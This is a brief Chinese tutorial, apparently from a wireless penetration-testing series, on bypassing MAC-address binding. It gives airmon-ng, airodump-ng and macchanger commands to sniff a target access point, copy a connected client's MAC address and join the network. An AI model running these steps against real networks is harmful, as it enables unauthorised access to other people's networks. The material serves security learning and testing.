首先还是老样子,将网卡置入侦听模式。
service network-manager stop
airmon-ng check kill
airmon-ng start wlan2
iwconfig
将网卡置入与AP相同的 11 号信道中。
iw dev wlan2mon set channel 11(也可以在开始时就指定信道)
开始对指定AP进行抓包。
airodump-ng wlan2mon -c 11 –bssid xxxxxxxxxx
我们可以看到,目前有一个终端设备MAC结尾为AA的设备与其进行连接。
下面我们就可以开始更改我们机器的MAC地址了。(这里我使用的是另一块网卡 wlan0)
先将它 down 掉。
ifconfig wlan0 down
macchanger -m 68xxxxxxxxAA wlan0
激活网卡。
ifconfig wlan0 up
通过 ifconfig 命令我们可以看到我们伪造的 Mac 地址机器,已经成功获取到 IP 。
原创文章,转载请注明来源!即刻安全(secist.com)
文章地址:http://www.secist.com/?p=66&preview=true
转载请注明:即刻安全 » (四)无线渗透之Mac地址绑定攻击